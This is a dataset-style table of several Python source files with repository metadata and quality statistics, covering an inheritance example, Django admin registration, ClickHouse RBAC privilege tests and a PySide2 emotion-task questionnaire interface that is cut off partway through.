hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4c69a7076182f996dd343970c51576c16b3b5b05 | 501 | py | Python | basics-6-oops/diamond.py | jerinisready/python-for-beginners | a61e19236ab5c9336328d1d2ac8d055c1fbd800f | [
"Apache-2.0"
] | null | null | null | basics-6-oops/diamond.py | jerinisready/python-for-beginners | a61e19236ab5c9336328d1d2ac8d055c1fbd800f | [
"Apache-2.0"
] | null | null | null | basics-6-oops/diamond.py | jerinisready/python-for-beginners | a61e19236ab5c9336328d1d2ac8d055c1fbd800f | [
"Apache-2.0"
] | 3 | 2017-11-02T12:58:25.000Z | 2018-05-05T07:29:23.000Z | class A:
def get(self):
print "GET of A"
def post(self):
print "POST OF A"
class B(A):
def post(self):
print "POST OF B"
def put(self):
print "PUT OF D"
class C(A):
def get(self):
print "GET of C"
def post(self):
print "POST OF C"
def put(self):
print "PUT OF D"
class D(B,C):
def put(self):
print "PUT OF D"
if __name__ == '__main__':
d1 = D()
# d1.get()
# d1.post()
# d1.put()
| 13.916667 | 26 | 0.477046 | 79 | 501 | 2.924051 | 0.202532 | 0.311688 | 0.142857 | 0.207792 | 0.800866 | 0.800866 | 0.705628 | 0.324675 | 0 | 0 | 0 | 0.012903 | 0.381238 | 501 | 35 | 27 | 14.314286 | 0.732258 | 0.053892 | 0 | 0.5 | 0 | 0 | 0.159574 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.363636 | 0 | 0 | 0 | null | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
911d432e94b5a7f61accc8fc8aec84f5513d5446 | 42 | py | Python | kissom_pg/__init__.py | joemarchionna/kissom_pg | 804d164df4da7323d8628aa631e7a504d21bdc06 | [
"MIT"
] | null | null | null | kissom_pg/__init__.py | joemarchionna/kissom_pg | 804d164df4da7323d8628aa631e7a504d21bdc06 | [
"MIT"
] | null | null | null | kissom_pg/__init__.py | joemarchionna/kissom_pg | 804d164df4da7323d8628aa631e7a504d21bdc06 | [
"MIT"
] | null | null | null | from kissom_pg.pgAdapter import PgAdapter
| 21 | 41 | 0.880952 | 6 | 42 | 6 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095238 | 42 | 1 | 42 | 42 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
912a4424e2340edb9ca6adb31bb8cb3aaeb5b350 | 181 | py | Python | consensx/admin.py | derPuntigamer/CoNSEnsX-unchained | 56ec667ddf98953f142d2c5a24f6f86880f9eb62 | [
"MIT"
] | 3 | 2016-09-05T21:46:32.000Z | 2019-09-24T08:19:37.000Z | consensx/admin.py | PPKE-Bioinf/consensx.itk.ppke.hu | 56ec667ddf98953f142d2c5a24f6f86880f9eb62 | [
"MIT"
] | 48 | 2016-09-05T11:07:10.000Z | 2021-09-22T19:02:18.000Z | consensx/admin.py | derPuntigamer/CoNSEnsX-unchained | 56ec667ddf98953f142d2c5a24f6f86880f9eb62 | [
"MIT"
] | 1 | 2016-04-20T07:44:39.000Z | 2016-04-20T07:44:39.000Z | from django.contrib import admin
from .models import CSX_upload, CSX_calculation
# Register your models here.
admin.site.register(CSX_upload)
admin.site.register(CSX_calculation)
| 22.625 | 47 | 0.828729 | 26 | 181 | 5.615385 | 0.5 | 0.123288 | 0.232877 | 0.273973 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.099448 | 181 | 7 | 48 | 25.857143 | 0.895706 | 0.143646 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
913b64cef692c98769db61f6a7feed428aba4775 | 8,283 | py | Python | tests/testflows/rbac/tests/privileges/show/show_tables.py | mcspring/ClickHouse | 08f713f177f950c2f675c2c75d1261c91066888c | [
"Apache-2.0"
] | 18 | 2021-05-29T01:12:33.000Z | 2021-11-18T12:34:48.000Z | tests/testflows/rbac/tests/privileges/show/show_tables.py | mcspring/ClickHouse | 08f713f177f950c2f675c2c75d1261c91066888c | [
"Apache-2.0"
] | null | null | null | tests/testflows/rbac/tests/privileges/show/show_tables.py | mcspring/ClickHouse | 08f713f177f950c2f675c2c75d1261c91066888c | [
"Apache-2.0"
] | 2 | 2021-07-13T06:42:45.000Z | 2021-07-21T13:47:22.000Z | from testflows.core import *
from testflows.asserts import error
from rbac.requirements import *
from rbac.helper.common import *
import rbac.helper.errors as errors
@TestSuite
def table_privileges_granted_directly(self, node=None):
"""Check that a user is able to execute `CHECK` and `EXISTS`
commands on a table and see the table when they execute `SHOW TABLE` command
if and only if they have any privilege on that table granted directly.
"""
user_name = f"user_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
table_name = f"table_name_{getuid()}"
Suite(run=check_privilege, flags=TE,
examples=Examples("privilege on grant_target_name user_name table_name", [
tuple(list(row)+[user_name,user_name,table_name]) for row in check_privilege.examples
], args=Args(name="check privilege={privilege}", format_name=True)))
@TestSuite
def table_privileges_granted_via_role(self, node=None):
"""Check that a user is able to execute `CHECK` and `EXISTS`
commands on a table and see the table when they execute `SHOW TABLE` command
if and only if they have any privilege on that table granted via role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"), role(node, f"{role_name}"):
table_name = f"table_name_{getuid()}"
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Suite(run=check_privilege, flags=TE,
examples=Examples("privilege on grant_target_name user_name table_name", [
tuple(list(row)+[role_name,user_name,table_name]) for row in check_privilege.examples
], args=Args(name="check privilege={privilege}", format_name=True)))
@TestOutline(Suite)
@Examples("privilege on",[
("SHOW", "*.*"),
("SHOW TABLES", "table"),
("SELECT", "table"),
("INSERT", "table"),
("ALTER", "table"),
("SELECT(a)", "table"),
("INSERT(a)", "table"),
("ALTER(a)", "table"),
])
def check_privilege(self, privilege, on, grant_target_name, user_name, table_name, node=None):
"""Run checks for commands that require SHOW TABLE privilege.
"""
if node is None:
node = self.context.node
Suite(test=show_tables, setup=instrument_clickhouse_server_log)(privilege=privilege, on=on, grant_target_name=grant_target_name, user_name=user_name, table_name=table_name)
Suite(test=exists, setup=instrument_clickhouse_server_log)(privilege=privilege, on=on, grant_target_name=grant_target_name, user_name=user_name, table_name=table_name)
Suite(test=check, setup=instrument_clickhouse_server_log)(privilege=privilege, on=on, grant_target_name=grant_target_name, user_name=user_name, table_name=table_name)
@TestSuite
@Requirements(
RQ_SRS_006_RBAC_ShowTables_RequiredPrivilege("1.0"),
)
def show_tables(self, privilege, on, grant_target_name, user_name, table_name, node=None):
"""Check that user is only able to see a table in SHOW TABLES when they have a privilege on that table.
"""
exitcode, message = errors.not_enough_privileges(name=user_name)
if node is None:
node = self.context.node
on = on.replace("table", f"{table_name}")
with table(node, table_name):
with Scenario("SHOW TABLES without privilege"):
with When("I check the user doesn't see the table"):
output = node.query("SHOW TABLES", settings = [("user", f"{user_name}")]).output
assert output == '', error()
with Scenario("SHOW TABLES with privilege"):
with When(f"I grant {privilege} on the table"):
node.query(f"GRANT {privilege} ON {on} TO {grant_target_name}")
with Then("I check the user does see a table"):
node.query("SHOW TABLES", settings = [("user", f"{user_name}")], message=f"{table_name}")
with Scenario("SHOW TABLES with revoked privilege"):
with When(f"I grant {privilege} on the table"):
node.query(f"GRANT {privilege} ON {on} TO {grant_target_name}")
with And(f"I revoke {privilege} on the table"):
node.query(f"REVOKE {privilege} ON {on} FROM {grant_target_name}")
with Then("I check the user does not see a table"):
output = node.query("SHOW TABLES", settings = [("user", f"{user_name}")]).output
assert output == '', error()
@TestSuite
@Requirements(
RQ_SRS_006_RBAC_ExistsTable_RequiredPrivilege("1.0"),
)
def exists(self, privilege, on, grant_target_name, user_name, table_name, node=None):
"""Check that user is able to execute EXISTS on a table if and only if the user has SHOW TABLE privilege
on that table.
"""
exitcode, message = errors.not_enough_privileges(name=user_name)
if node is None:
node = self.context.node
if on == "table":
on = f"{table_name}"
with table(node, table_name):
with Scenario("EXISTS without privilege"):
with When(f"I check if {table_name} EXISTS"):
node.query(f"EXISTS {table_name}", settings=[("user",user_name)],
exitcode=exitcode, message=message)
with Scenario("EXISTS with privilege"):
with When(f"I grant {privilege} on the table"):
node.query(f"GRANT {privilege} ON {on} TO {grant_target_name}")
with Then(f"I check if {table_name} EXISTS"):
node.query(f"EXISTS {table_name}", settings=[("user",user_name)])
with Scenario("EXISTS with revoked privilege"):
with When(f"I grant {privilege} on the table"):
node.query(f"GRANT {privilege} ON {on} TO {grant_target_name}")
with And(f"I revoke {privilege} on the table"):
node.query(f"REVOKE {privilege} ON {on} FROM {grant_target_name}")
with Then(f"I check if {table_name} EXISTS"):
node.query(f"EXISTS {table_name}", settings=[("user",user_name)],
exitcode=exitcode, message=message)
@TestSuite
@Requirements(
RQ_SRS_006_RBAC_CheckTable_RequiredPrivilege("1.0"),
)
def check(self, privilege, on, grant_target_name, user_name, table_name, node=None):
"""Check that user is able to execute CHECK on a table if and only if the user has SHOW TABLE privilege
on that table.
"""
exitcode, message = errors.not_enough_privileges(name=user_name)
if node is None:
node = self.context.node
if on == "table":
on = f"{table_name}"
with table(node, table_name):
with Scenario("CHECK without privilege"):
with When(f"I CHECK {table_name}"):
node.query(f"CHECK TABLE {table_name}", settings=[("user",user_name)],
exitcode=exitcode, message=message)
with Scenario("CHECK with privilege"):
with When(f"I grant {privilege} on the table"):
node.query(f"GRANT {privilege} ON {on} TO {grant_target_name}")
with Then(f"I CHECK {table_name}"):
node.query(f"CHECK TABLE {table_name}", settings=[("user",user_name)])
with Scenario("CHECK with revoked privilege"):
with When(f"I grant {privilege} on the table"):
node.query(f"GRANT {privilege} ON {on} TO {grant_target_name}")
with And(f"I revoke {privilege} on the table"):
node.query(f"REVOKE {privilege} ON {on} FROM {grant_target_name}")
with Then(f"I CHECK {table_name}"):
node.query(f"CHECK TABLE {table_name}", settings=[("user",user_name)],
exitcode=exitcode, message=message)
@TestFeature
@Name("show tables")
@Requirements(
RQ_SRS_006_RBAC_ShowTables_Privilege("1.0"),
)
def feature(self, node="clickhouse1"):
"""Check the RBAC functionality of SHOW TABLES.
"""
self.context.node = self.context.cluster.node(node)
Suite(run=table_privileges_granted_directly, setup=instrument_clickhouse_server_log)
Suite(run=table_privileges_granted_via_role, setup=instrument_clickhouse_server_log)
| 40.404878 | 176 | 0.650368 | 1,131 | 8,283 | 4.600354 | 0.099912 | 0.064002 | 0.060542 | 0.039208 | 0.827023 | 0.776283 | 0.739189 | 0.719585 | 0.709014 | 0.701326 | 0 | 0.003283 | 0.227695 | 8,283 | 204 | 177 | 40.602941 | 0.810067 | 0.10431 | 0 | 0.539568 | 0 | 0 | 0.271972 | 0.011446 | 0 | 0 | 0 | 0 | 0.021583 | 1 | 0.05036 | false | 0 | 0.035971 | 0 | 0.086331 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e6a1036a9e342b813661ccee14b5dab9fa34c26f | 121 | py | Python | gdom/__init__.py | wis/gdom | f832c915f8cc39510f5bc734a2665715acbc747b | [
"BSD-3-Clause"
] | 1,323 | 2016-02-25T19:57:24.000Z | 2022-03-16T11:36:11.000Z | gdom/__init__.py | wis/gdom | f832c915f8cc39510f5bc734a2665715acbc747b | [
"BSD-3-Clause"
] | 13 | 2016-02-26T18:57:48.000Z | 2020-06-10T11:47:40.000Z | gdom/__init__.py | wis/gdom | f832c915f8cc39510f5bc734a2665715acbc747b | [
"BSD-3-Clause"
] | 46 | 2016-02-26T05:18:03.000Z | 2021-01-31T02:06:53.000Z | from .schema import schema, Node, Element, Document, Query
__all__ = ['schema', 'Node', 'Element', 'Document', 'Query']
| 30.25 | 60 | 0.68595 | 14 | 121 | 5.642857 | 0.571429 | 0.253165 | 0.43038 | 0.632911 | 0.759494 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132231 | 121 | 3 | 61 | 40.333333 | 0.752381 | 0 | 0 | 0 | 0 | 0 | 0.247934 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
e6b473deb0aa2ed7e62145bca2557aa5ea371d61 | 27,695 | py | Python | src/BehaviorTaskMaster/QtUtility/taskwidgets.py | FongAnthonyM/BehaviorTaskMaster | 250e2853a96dd6914cf8d40265b450d898091492 | [
"MIT"
] | null | null | null | src/BehaviorTaskMaster/QtUtility/taskwidgets.py | FongAnthonyM/BehaviorTaskMaster | 250e2853a96dd6914cf8d40265b450d898091492 | [
"MIT"
] | 34 | 2021-12-01T01:53:13.000Z | 2022-03-28T11:28:09.000Z | src/BehaviorTaskMaster/QtUtility/taskwidgets.py | FongAnthonyM/BehaviorTaskMaster | 250e2853a96dd6914cf8d40265b450d898091492 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
""" taskwidgets.py
Description:
"""
__author__ = "Anthony Fong"
__copyright__ = "Copyright 2019, Anthony Fong"
__credits__ = ["Anthony Fong"]
__license__ = ""
__version__ = "1.0.0"
__maintainer__ = "Anthony Fong"
__email__ = ""
__status__ = "Prototype"
# Default Libraries #
import sys
import pathlib
# Downloaded Libraries #
from bidict import bidict
from bidict import frozenbidict
import toml
from PySide2 import QtCore, QtGui, QtWidgets, QtMultimedia, QtMultimediaWidgets
from PySide2.QtGui import QKeySequence
from PySide2.QtWidgets import QWidget, QAction
# Local Libraries #
from .utilitywidgets import WidgetStack
from .UI.emotioninstructions import Ui_EmotionInstructions
from .UI.emotionwashout import Ui_EmotionWashout
from .UI.emotionquestionnaire import Ui_EmotionQuestionnaire
from .UI.emotionquestionnaireimage import Ui_EmotionQuestionnaireImage
from .UI.emotionvideoplayer import Ui_EmotionVideoPlayer
from .UI.emotionfinish import Ui_EmotionFinish
# Definitions #
# Classes #
class TaskWindow(WidgetStack):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.sequencer = None
self.fullscreenAction = QAction("FullScreen", self)
self.fullscreenAction.setShortcut(QKeySequence.FullScreen)
self.fullscreenAction.triggered.connect(self.fullscreen_action)
self.addAction(self.fullscreenAction)
def fullscreen_action(self):
if self.isFullScreen():
self.showNormal()
else:
self.showFullScreen()
class InstructionsWidget(QWidget):
def __init__(self):
super().__init__()
self.ok_action = self.default_ok
self.back_action = self.default_back
self.ui = Ui_EmotionInstructions()
self.ui.setupUi(self)
self.ui.okButton.clicked.connect(self.ok)
self.ui.backButton.clicked.connect(self.back)
self.okAction = QAction("OK", self)
self.okAction.setShortcut(QKeySequence("Shift+Return"))
self.okAction.triggered.connect(self.ok_action)
self.addAction(self.okAction)
self.text = None
def set_text(self, text=None):
if text is not None:
self.text = text
self.ui.textBrowser.setText(self.text)
def ok(self):
event = {'type_': 'Instructions', 'Accepted': True}
self.ok_action(event=event, caller=self)
def default_ok(self, event=None, caller=None):
print("Not Connected")
def back(self):
event = {'type_': 'Instructions', 'Accepted': False}
self.back_action(event=event, caller=self)
def default_back(self, event=None, caller=None):
sys.exit()
class WashoutWidget(QWidget):
def __init__(self):
super(WashoutWidget, self).__init__()
self.timer_action = self.default_timer_action
self.ui = Ui_EmotionWashout()
self.ui.setupUi(self)
self.timer = QtCore.QTimer(self)
self.timer.setSingleShot(True)
self.timer.timeout.connect(self.timeout)
self.milliseconds = 0
self.color = 'rgb' + str((224, 224, 224))
self.ui.colorSpacer.setStyleSheet('background-color:' + self.color)
def set_text(self, t):
self.ui.label.setText(t)
def set_font_size(self, s):
font = self.ui.label.font()
font.setPointSize(s)
self.ui.label.setFont(font)
def start(self, washout_length=None):
if washout_length is not None:
self.milliseconds = washout_length
self.timer.start(self.milliseconds)
def timeout(self):
event = {'type_': 'Washout_Finished', 'Duration': self.milliseconds / 1000}
self.timer_action(event=event, caller=self)
def default_timer_action(self, event=None, caller=None):
print("Time is up!")
class QuestionnaireWidget(QWidget):
number_key = frozenbidict({0: QtCore.Qt.Key_0, 1: QtCore.Qt.Key_1, 2: QtCore.Qt.Key_2, 3: QtCore.Qt.Key_3,
4: QtCore.Qt.Key_4, 5: QtCore.Qt.Key_5, 6: QtCore.Qt.Key_6, 7: QtCore.Qt.Key_7,
8: QtCore.Qt.Key_8, 9: QtCore.Qt.Key_9})
def __init__(self, next_action=None, finish_action=None, previous_action=None, back_action=None, answer_action=None,
**kwargs):
super().__init__(**kwargs)
if next_action is None:
self.next_action = self.default_next
else:
self.next_action = next_action
if finish_action is None:
self.finish_action = self.default_finish
else:
self.finish_action = finish_action
if previous_action is None:
self.previous_action = self.default_previous
else:
self.previous_action = previous_action
if back_action is None:
self.back_action = self.default_back
else:
self.back_action = back_action
if answer_action is None:
self.answer_action = self.default_answer
else:
self.answer_action = answer_action
self.ui = Ui_EmotionQuestionnaire()
self.ui.setupUi(self)
self.ui.continueButton.clicked.connect(self._continue)
self.ui.backButton.clicked.connect(self.previous)
self.continueAction = QAction("Continue", self)
self.continueAction.setShortcut(QKeySequence("Shift+Return"))
self.continueAction.triggered.connect(self._continue)
self.addAction(self.continueAction)
self._path = None
self.text = None
self.qa = []
self.answers = []
self.answer_key = bidict()
self.q_index = 0
self.multi_answers = 1
self.current_question = None
self.current_answers = None
self.current_color = None
self.selected_answer = ""
@property
def path(self):
return self._path
@path.setter
def path(self, value):
if isinstance(value, pathlib.Path) or value is None:
self._path = value
else:
self._path = pathlib.Path(value)
def load_file(self, file):
if file is not None:
self.path = file
if self.path.as_posix() != '.':
q_file = toml.load(self.path)
self.qa = q_file['Questions']
self.q_index = 0
qa = self.qa[self.q_index]
self.set_color(qa['color'])
self.set_question(qa['question'])
self.set_answers(qa['answers'], qa['format'])
def set_color(self, color):
if color is not None:
self.ui.colorSpacer.setStyleSheet('background-color:rgb(' + color + ')')
self.current_color = color
def set_question(self, question):
self.ui.questionBrowser.setText(question)
self.current_question = question
def set_answers(self, answers, _format=None):
self.remove_answers()
self.current_answers = answers
if _format == 'scale':
size = (1, len(answers))
else:
size = (2, -(-len(answers) // 2))
b_size = (size[0] + 2, size[1] + 2)
topSpacer = QtWidgets.QSpacerItem(20, 5, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
bottomSpacer = QtWidgets.QSpacerItem(20, 5, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
leftSpacer = QtWidgets.QSpacerItem(5, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
rightSpacer = QtWidgets.QSpacerItem(5, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.ui.answersLayout.addItem(topSpacer, 0, 0, 1, b_size[1])
self.ui.answersLayout.addItem(bottomSpacer, b_size[1], 0, 1, b_size[1])
self.ui.answersLayout.addItem(leftSpacer, 1, 0, size[1], 1)
self.ui.answersLayout.addItem(rightSpacer, 1, size[1] + 1, size[1], 1)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
font = QtGui.QFont()
font.setPointSize(18)
self.ui.answerChecks = []
for i in range(0, size[0]):
for j in range(0, size[1]):
a_index = i * size[1] + j
if a_index < len(answers):
answer_check = QtWidgets.QCheckBox(self.ui.answersBox)
sizePolicy.setHeightForWidth(answer_check.sizePolicy().hasHeightForWidth())
answer_check.setSizePolicy(sizePolicy)
answer_check.setFont(font)
answer_check.setObjectName('answer_check_' + str(a_index))
answer_check.setText(
QtWidgets.QApplication.translate("EmotionQuestionnaire", answers[a_index], None, -1))
answer_check.clicked.connect(self.generate_answer_function(answer_check))
self.ui.answerChecks.append(answer_check)
self.ui.answersLayout.addWidget(answer_check, i + 1, j + 1, 1, 1)
self.answer_key[answers[a_index]] = answer_check
def remove_answers(self):
self.answer_key.clear()
while not self.ui.answersLayout.isEmpty():
item = self.ui.answersLayout.takeAt(0)
if not item.isEmpty():
widget = item.widget()
widget.deleteLater()
del widget
self.ui.answersLayout.removeItem(item)
def generate_answer_function(self, answer_check):
return lambda v: self.answer_toggle(answer_check, v)
def answer_toggle(self, answer_check, value):
self.answer(answer_check, value)
if self.multi_answers > 0:
self.limit_answer(self.multi_answers, answer_check)
def answer(self, check_widget, value):
answer = self.answer_key.inverse[check_widget]
if answer is None:
answer = ""
self.selected_answer = answer
event = {'type_': 'Questionnaire_AnswerSelected', 'File': self.path.name,
'Question': self.current_question, 'Answer': answer, 'Value': value}
self.answer_action(event=event, caller=self)
def limit_answer(self, limit, last):
available = limit
other_answers = self.answer_key.copy()
other_answers.inverse.pop(last)
for answer in other_answers.values():
if answer.isChecked():
if available > 1:
available -= 1
else:
answer.setChecked(False)
def default_answer(self, event=None, caller=None):
pass
def keyPressEvent(self, event):
key = event.key()
if key in self.number_key.inverse:
number = self.number_key.inverse[key]
if number < len(self.current_answers):
check_widget = self.answer_key[self.current_answers[number]]
check_widget.setChecked(True)
self.answer_toggle(check_widget, True)
elif key == QtCore.Qt.Key_Enter or key == QtCore.Qt.Key_Return:
self._continue()
elif key == QtCore.Qt.Key_Backspace:
self.previous()
event.accept()
def _continue(self):
self.q_index += 1
event = {'type_': 'Questionnaire_AnswerConfirmed', 'File': self.path.name,
'Question': self.current_question, 'Answer': self.selected_answer}
if self.q_index < len(self.qa):
self.next_action(event=event, caller=self)
else:
self.finish_action(event=event, caller=self)
def default_next(self, event=None, caller=None):
if self.q_index < len(self.qa) - 1:
self.ui.continueButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Next", None, -1))
self.ui.backButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Previous", None, -1))
else:
self.ui.continueButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Done", None, -1))
self.ui.backButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Previous", None, -1))
qa = self.qa[self.q_index]
self.set_color(qa['color'])
self.set_question(qa['question'])
self.set_answers(qa['answers'], qa['format'])
def default_finish(self, event=None, caller=None):
print("Not Connected")
def previous(self):
if self.q_index > 0:
self.q_index -= 1
event = {'type_': 'Questionnaire_AnswerRetracted', 'File': self.path.name,
'Question': self.qa[self.q_index]['question']}
self.previous_action(event=event, caller=self)
else:
event = {'type_': 'Questionnaire_Exited', 'File': self.path.name}
self.back_action(event=event, caller=self)
def default_previous(self, event=None, caller=None):
if self.q_index > 0:
self.ui.continueButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Next", None, -1))
self.ui.backButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Previous", None, -1))
else:
self.ui.continueButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Next", None, -1))
self.ui.backButton.setText(QtWidgets.QApplication.translate("EmotionQuestionnaire", "Exit", None, -1))
qa = self.qa[self.q_index]
self.set_color(qa['color'])
self.set_question(qa['question'])
self.set_answers(qa['answers'], qa['format'])
def default_back(self, event=None, caller=None):
print('There is no going back')
class QuestionnaireImageWidget(QWidget):
number_key = frozenbidict({0: QtCore.Qt.Key_0, 1: QtCore.Qt.Key_1, 2: QtCore.Qt.Key_2, 3: QtCore.Qt.Key_3,
